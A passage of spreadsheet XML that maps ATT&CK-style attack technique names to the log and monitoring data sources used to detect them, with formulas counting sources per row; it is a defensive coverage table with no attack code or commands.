      </c>
      <c r="C195" s="8" t="s">
        <v>1168</v>
      </c>
      <c r="D195">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E195">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H195" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:B)</f>
        <v>Spearphishing via Service</v>
      </c>
    </row>
    <row r="196" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A196" s="11" t="s">
        <v>255</v>
      </c>
      <c r="B196" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C196" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D196">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E196">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H196" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:B)</f>
        <v>Supply Chain Compromise</v>
      </c>
    </row>
    <row r="197" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A197" s="11" t="s">
        <v>256</v>
      </c>
      <c r="B197" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C197" s="8" t="s">
        <v>1185</v>
      </c>
      <c r="D197">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E197">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="H197" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:B)</f>
        <v>Control Panel Items</v>
      </c>
    </row>
    <row r="198" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A198" s="11" t="s">
        <v>257</v>
      </c>
      <c r="B198" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Packet capture,Windows event logs</v>
      </c>
      <c r="C198" s="8" t="s">
        <v>1127</v>
      </c>
      <c r="D198">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E198">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H198" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
    </row>
    <row r="199" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A199" s="11" t="s">
        <v>258</v>
      </c>
      <c r="B199" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C199" s="8" t="s">
        <v>1185</v>
      </c>
      <c r="D199">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E199">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="H199" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:B)</f>
        <v>SIP and Trust Provider Hijacking</v>
      </c>
    </row>
    <row r="200" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A200" s="11" t="s">
        <v>259</v>
      </c>
      <c r="B200" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C200" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D200">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E200">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H200" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:B)</f>
        <v>Trusted Relationship</v>
      </c>
    </row>
    <row r="201" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A201" s="11" t="s">
        <v>260</v>
      </c>
      <c r="B201" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C201" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D201">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E201">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H201" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:B)</f>
        <v>Hardware Additions</v>
      </c>
    </row>
    <row r="202" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A202" s="11" t="s">
        <v>261</v>
      </c>
      <c r="B202" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C202" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D202">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E202">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="H202" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:B)</f>
        <v>Password Policy Discovery</v>
      </c>
    </row>
    <row r="203" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A203" s="11" t="s">
        <v>262</v>
      </c>
      <c r="B203" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C203" s="8" t="s">
        <v>1168</v>
      </c>
      <c r="D203">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E203">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H203" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:B)</f>
        <v>Indirect Command Execution</v>
      </c>
    </row>
    <row r="204" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A204" s="11" t="s">
        <v>263</v>
      </c>
      <c r="B204" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C204" s="8" t="s">
        <v>1117</v>
      </c>
      <c r="D204">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E204">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H204" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Client Execution</v>
      </c>
    </row>
    <row r="205" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A205" s="11" t="s">
        <v>264</v>
      </c>
      <c r="B205" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="8" t="s">
        <v>1117</v>
      </c>
      <c r="D205">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H205" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:B)</f>
        <v>User Execution</v>
      </c>
    </row>
    <row r="206" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A206" s="11" t="s">
        <v>265</v>
      </c>
      <c r="B206" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C206" s="8">
        <v>0</v>
      </c>
      <c r="D206">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E206">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="H206" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:B)</f>
        <v>Port Knocking</v>
      </c>
    </row>
    <row r="207" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A207" s="11" t="s">
        <v>266</v>
      </c>
      <c r="B207" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C207" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D207">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E207">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="H207" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:B)</f>
        <v>Sudo Caching</v>
      </c>
    </row>
    <row r="208" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A208" s="11" t="s">
        <v>267</v>
      </c>
      <c r="B208" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C208" s="8" t="s">
        <v>1184</v>
      </c>
      <c r="D208">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H208" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:B)</f>
        <v>DCShadow</v>
      </c>
    </row>
    <row r="209" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A209" s="11" t="s">
        <v>268</v>
      </c>
      <c r="B209" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C209" s="8">
        <v>100</v>
      </c>
      <c r="D209">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E209">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="H209" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:B)</f>
        <v>Kerberoasting</v>
      </c>
    </row>
    <row r="210" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A210" s="11" t="s">
        <v>269</v>
      </c>
      <c r="B210" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C210" s="8" t="s">
        <v>1186</v>
      </c>
      <c r="D210">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E210">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="H210" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:B)</f>
        <v>Time Providers</v>
      </c>
    </row>
    <row r="211" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A211" s="11" t="s">
        <v>270</v>
      </c>
      <c r="B211" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C211" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D211">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H211" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:B)</f>
        <v>Exploitation of Remote Services</v>
      </c>
    </row>
    <row r="212" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A212" s="11" t="s">
        <v>271</v>
      </c>
      <c r="B212" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C212" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D212">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E212">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H212" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Defense Evasion</v>
      </c>
    </row>
    <row r="213" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A213" s="11" t="s">
        <v>272</v>
      </c>
      <c r="B213" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C213" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D213">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E213">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H213" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Credential Access</v>
      </c>
    </row>
    <row r="214" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A214" s="11" t="s">
        <v>273</v>
      </c>
      <c r="B214" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C214" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D214">
        <f t="shared" si="7"/>
        <v>8</v>
      </c>
      <c r="E214">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H214" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:B)</f>
        <v>Data from Information Repositories</v>
      </c>
    </row>
    <row r="215" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A215" s="11" t="s">
        <v>274</v>
      </c>
      <c r="B215" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C215" s="8" t="s">
        <v>1162</v>
      </c>
      <c r="D215">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E215">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H215" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:B)</f>
        <v>Credentials in Registry</v>
      </c>
    </row>
    <row r="216" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A216" s="11" t="s">
        <v>275</v>
      </c>
      <c r="B216" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C216" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D216">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E216">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H216" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:B)</f>
        <v>Kernel Modules and Extensions</v>
      </c>
    </row>
    <row r="217" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A217" s="11" t="s">
        <v>276</v>
      </c>
      <c r="B217" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C217" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D217">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="H217" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:B)</f>
        <v>Signed Script Proxy Execution</v>
      </c>
    </row>
    <row r="218" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A218" s="11" t="s">
        <v>277</v>
      </c>
      <c r="B218" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C218" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D218">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E218">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H218" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:B)</f>
        <v>Browser Bookmark Discovery</v>
      </c>
    </row>
    <row r="219" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A219" s="11" t="s">
        <v>278</v>
      </c>
      <c r="B219" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C219" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D219">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E219">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="H219" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:B)</f>
        <v>Signed Binary Proxy Execution</v>
      </c>
    </row>
    <row r="220" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A220" s="11" t="s">
        <v>279</v>
      </c>
      <c r="B220" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C220" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D220">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E220">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H220" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:B)</f>
        <v>Remote Access Tools</v>
      </c>
    </row>
    <row r="221" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A221" s="11" t="s">
        <v>280</v>
      </c>
      <c r="B221" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C221" s="8" t="s">
        <v>1181</v>
      </c>
      <c r="D221">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H221" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:B)</f>
        <v>XSL Script Processing</v>
      </c>
    </row>
    <row r="222" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A222" s="11" t="s">
        <v>281</v>
      </c>
      <c r="B222" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C222" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D222">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H222" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:B)</f>
        <v>Template Injection</v>
      </c>
    </row>
    <row r="223" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A223" s="11" t="s">
        <v>282</v>
      </c>
      <c r="B223" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C223" s="8" t="s">
        <v>1154</v>
      </c>
      <c r="D223">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E223">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="H223" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:B)</f>
        <v>File and Directory Permissions Modification</v>
      </c>
    </row>
    <row r="224" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A224" s="11" t="s">
        <v>283</v>
      </c>
      <c r="B224" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C224" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D224">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E224">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="H224" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:B)</f>
        <v>Compiled HTML File</v>
      </c>
    </row>
    <row r="225" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A225" s="13" t="s">
        <v>1381</v>
      </c>
      <c r="B225" s="14" t="str">
        <f>LOOKUP(A225,'[1]REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C225" s="15">
        <v>100</v>
      </c>
      <c r="D225" s="14">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E225" s="14">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="226" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A226" s="13" t="s">
        <v>1386</v>
      </c>
      <c r="B226" s="14" t="str">
        <f>LOOKUP(A226,'[1]REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C226" s="15" t="s">
        <v>1605</v>
      </c>
      <c r="D226" s="14">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E226" s="14">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="227" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A227" s="13" t="s">
        <v>1391</v>
      </c>
      <c r="B227" s="14" t="str">
        <f>LOOKUP(A227,'[1]REF-DataSources'!A:C)</f>
        <v>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</v>
      </c>
      <c r="C227" s="15" t="s">
        <v>1606</v>
      </c>
      <c r="D227" s="14">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E227" s="14">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="228" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A228" s="13" t="s">
        <v>1396</v>
      </c>
      <c r="B228" s="14" t="str">
        <f>LOOKUP(A228,'[1]REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C228" s="15">
        <v>100</v>
      </c>
      <c r="D228" s="14">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E228" s="14">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="229" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A229" s="13" t="s">
        <v>1401</v>
      </c>
      <c r="B229" s="14" t="str">
        <f>LOOKUP(A229,'[1]REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C229" s="15" t="s">
        <v>1135</v>
      </c>
      <c r="D229" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E229" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="230" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A230" s="13" t="s">
        <v>1407</v>
      </c>
      <c r="B230" s="14" t="str">
        <f>LOOKUP(A230,'[1]REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C230" s="15" t="s">
        <v>1607</v>
      </c>
      <c r="D230" s="14">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E230" s="14">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="231" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A231" s="13" t="s">
        <v>1412</v>
      </c>
      <c r="B231" s="14" t="str">
        <f>LOOKUP(A231,'[1]REF-DataSources'!A:C)</f>
        <v>Kernel drivers,MBR</v>
      </c>
      <c r="C231" s="15" t="s">
        <v>1139</v>
      </c>
      <c r="D231" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E231" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="232" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A232" s="13" t="s">
        <v>1417</v>
      </c>
      <c r="B232" s="14" t="str">
        <f>LOOKUP(A232,'[1]REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C232" s="15" t="s">
        <v>1127</v>
      </c>
      <c r="D232" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E232" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="233" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A233" s="13" t="s">
        <v>1422</v>
      </c>
      <c r="B233" s="14" t="str">
        <f>LOOKUP(A233,'[1]REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
      <c r="C233" s="15" t="s">
        <v>1105</v>
      </c>
      <c r="D233" s="14">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E233" s="14">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="234" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A234" s="13" t="s">
        <v>1427</v>
      </c>
      <c r="B234" s="14" t="str">
        <f>LOOKUP(A234,'[1]REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C234" s="15" t="s">
        <v>1114</v>
      </c>
      <c r="D234" s="14">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E234" s="14">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="235" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A235" s="13" t="s">
        <v>1432</v>
      </c>
      <c r="B235" s="14" t="str">
        <f>LOOKUP(A235,'[1]REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
      <c r="C235" s="15" t="s">
        <v>1137</v>
      </c>
      <c r="D235" s="14">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E235" s="14">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="236" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A236" s="13" t="s">
        <v>1437</v>
      </c>
      <c r="B236" s="14" t="str">
        <f>LOOKUP(A236,'[1]REF-DataSources'!A:C)</f>
        <v>Application logs,File monitoring</v>
      </c>
      <c r="C236" s="15" t="s">
        <v>1126</v>
      </c>
      <c r="D236" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E236" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="237" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A237" s="13" t="s">
        <v>1442</v>
      </c>
      <c r="B237" s="14" t="str">
        <f>LOOKUP(A237,'[1]REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis</v>
      </c>
      <c r="C237" s="15" t="s">
        <v>1109</v>
      </c>
      <c r="D237" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E237" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="238" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A238" s="13" t="s">
        <v>1447</v>
      </c>
      <c r="B238" s="14" t="str">
        <f>LOOKUP(A238,'[1]REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C238" s="15" t="s">
        <v>1126</v>
      </c>
      <c r="D238" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E238" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="239" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A239" s="13" t="s">
        <v>1451</v>
      </c>
      <c r="B239" s="14" t="str">
        <f>LOOKUP(A239,'[1]REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
      <c r="C239" s="15" t="s">
        <v>1173</v>
      </c>
      <c r="D239" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E239" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="240" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A240" s="13" t="s">
        <v>1456</v>
      </c>
      <c r="B240" s="14" t="str">
        <f>LOOKUP(A240,'[1]REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
      <c r="C240" s="15" t="s">
        <v>1608</v>
      </c>
      <c r="D240" s="14">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E240" s="14">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="241" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A241" s="13" t="s">
        <v>1461</v>
      </c>
      <c r="B241" s="14" t="str">
        <f>LOOKUP(A241,'[1]REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C241" s="15" t="s">
        <v>1109</v>
      </c>
      <c r="D241" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E241" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="242" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A242" s="13" t="s">
        <v>1466</v>
      </c>
      <c r="B242" s="14" t="str">
        <f>LOOKUP(A242,'[1]REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C242" s="15" t="s">
        <v>1114</v>
      </c>
      <c r="D242" s="14">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E242" s="14">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="243" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A243" s="13" t="s">
        <v>1471</v>
      </c>
      <c r="B243" s="14" t="str">
        <f>LOOKUP(A243,'[1]REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
      <c r="C243" s="15" t="s">
        <v>1609</v>
      </c>
      <c r="D243" s="14">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E243" s="14">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
    </row>
    <row r="244" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A244" s="13" t="s">
        <v>1476</v>
      </c>
      <c r="B244" s="14" t="str">
        <f>LOOKUP(A244,'[1]REF-DataSources'!A:C)</f>
